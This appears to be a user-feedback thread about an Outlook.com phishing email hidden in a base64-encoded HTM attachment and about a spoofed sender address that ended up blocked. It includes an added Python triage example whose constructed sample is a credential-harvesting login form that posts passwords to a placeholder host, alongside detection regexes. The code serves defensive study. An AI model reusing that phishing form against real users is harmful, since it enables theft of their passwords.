I am getting this phishing email with an HTM attachment, BASE64 encoded of course, which then contains a webform with all assets, all parts BASE64 encoded. The form attempts to phish my password.
The Outlook.com spam filter does not recognize this blatant phish and delivers it as a legit email. I chose to report this phishing attempt so that Outlook.com recognizes this for future such emails.
Outlook chooses to put the sender on the blacklist and does not recognize that the FROM address contains my own mail address. If I had not checked the source code of this mail, I would not even be aware that I am now unable to send myself documents.
Team, this is your fix list:
- BASE64 is no rocket science and the HTM file makes it blatantly obvious it tries to steal passwords. This should be the easiest quarantine target out there if you take security seriously.
- Blacklisting your own email address should really not be in the tool chest of a mail client, should it?
Update: I received helpful feedback from Microsoft on this issue. Safe Sender overrode spam detection in this case. Teams are working on both how to modernize this space more holistically and how to fix the anti-phishing gap.
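The two gaps the post describes (a base64-encoded HTM attachment carrying a credential form, and a From address that matches the recipient) are both cheap to check on the receiving side. The following is an added example, not code from the thread or from Microsoft: it builds a constructed sample message with a base64 HTM attachment whose assets are base64 data URIs, then triages it. Function names, the `example.invalid` domain and the sample content are all assumptions.

```python
"""Added example: receiving-side triage of a mail whose HTM attachment
contains a credential-harvesting form. Sample message is constructed
inline; all names and addresses are assumptions."""
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Constructed sample attachment: a login form whose image asset is itself a
# base64 data URI, so every part of the page is base64 as the post describes.
ATTACHMENT_HTML = (
    '<html><body><img src="data:image/png;base64,iVBORw0KGgo=">'
    '<form method="post" action="https://example.invalid/collect">'
    '<input type="email" name="user">'
    '<input type="password" name="pass">'
    '<input type="submit" value="Sign in"></form></body></html>'
)

PASSWORD_INPUT = re.compile(r'<input[^>]*type\s*=\s*["\']?password', re.I)
FORM_ACTION = re.compile(r'<form[^>]*action\s*=\s*["\']([^"\']+)', re.I)
DATA_URI = re.compile(r'data:[^;]+;base64,', re.I)


def build_sample_message() -> bytes:
    """Constructed sample: From is forged to equal the recipient, and the HTM
    attachment is sent with Content-Transfer-Encoding: base64."""
    msg = EmailMessage()
    msg["From"] = "Alice Example <alice@example.invalid>"   # forged sender
    msg["To"] = "alice@example.invalid"                     # the victim
    msg["Subject"] = "Your document is ready"
    msg.set_content("Please open the attached document.")
    # Passing bytes makes the email library base64-encode the attachment.
    msg.add_attachment(ATTACHMENT_HTML.encode("utf-8"), maintype="text",
                       subtype="html", filename="document.htm")
    return msg.as_bytes()


def triage(raw: bytes) -> dict:
    """Decode HTM/HTML attachments and report credential forms plus
    sender-equals-recipient spoofing. Returns a plain dict of findings."""
    msg = message_from_bytes(raw, policy=policy.default)
    sender = msg["From"].addresses[0].addr_spec.lower() if msg["From"] else ""
    recipients = set()
    for field in ("To", "Cc"):
        if msg[field]:
            recipients.update(a.addr_spec.lower() for a in msg[field].addresses)

    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if part.get_content_type() != "text/html" and not name.endswith((".htm", ".html")):
            continue
        # get_payload(decode=True) undoes the base64 transport encoding.
        html = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        if not PASSWORD_INPUT.search(html):
            continue
        action = FORM_ACTION.search(html)
        findings.append({
            "filename": name,
            "action": action.group(1) if action else None,
            "base64_transport": (part.get("Content-Transfer-Encoding") or "").lower() == "base64",
            "embedded_base64_assets": len(DATA_URI.findall(html)),
        })

    spoofs_self = bool(sender) and sender in recipients
    return {
        "sender_spoofs_recipient": spoofs_self,
        "credential_forms": findings,
        # Quarantine the message; never add the recipient's own address to a
        # block list because a forged From header happened to contain it.
        "should_quarantine": bool(findings) or spoofs_self,
    }


if __name__ == "__main__":
    print(triage(build_sample_message()))
```

The design point is in the last field: the right response to a forged From that equals the recipient is to quarantine the message, not to block the address, because the address belongs to the victim, not the attacker.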
Forwarded to PM on Outlook team. (Retiring at end of the month, btw!)
PM is or you are?
Sometimes (only sometimes) I do miss my good old Notes email client …
Something that always gets on my nerves:
When I have a mail open in the main Outlook page and the mails are visible on the right side, and I reply to it in a new window, the right side always scrolls up automatically when I type.
This is really disturbing, as I sometimes scroll down to an "older" mail in the mail thread while typing (to read up on something).